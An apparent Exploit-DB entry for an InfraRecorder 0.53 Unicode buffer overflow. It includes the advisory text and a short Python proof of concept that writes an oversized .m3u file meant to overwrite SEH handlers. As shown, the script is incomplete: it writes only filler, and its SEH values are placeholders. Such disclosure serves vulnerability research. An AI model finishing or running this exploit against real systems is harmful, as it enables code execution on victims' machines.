InfraRecorder Unicode Buffer Overflow

vendor:

InfraRecorder

by:

Osanda Malith

7,5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: InfraRecorder

Affected Version From: 0.53

Affected Version To: 0.53

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP sp2

2013

InfraRecorder Unicode Buffer Overflow

InfraRecorder is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.

Mitigation:

Ensure that the application performs adequate boundary checks on user-supplied data.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/67076/info

InfraRecorder is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.

InfraRecorder 0.53 is vulnerable; other versions may also be affected. 

#!/usr/bin/python
# Exploit Title: InfraRecorder Unicode Buffer Overflow
# Version: version 0.53
# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
# Tested on: Windows XP sp2
# Exploit Author: Osanda Malith 
'''
We can overwrite the nseh and seh handlers. If you find a valid unicode ppr address
you can build a successful exploit.
'''
'''
Click Edit -> Import -> import our buffer
'''
junk = "A"*262
nseh = "BB"
seh = "CC"
junk2 = "D"*20000
file=open("Exploit.m3u","w")
file.write(junk)
file.close()
#EOF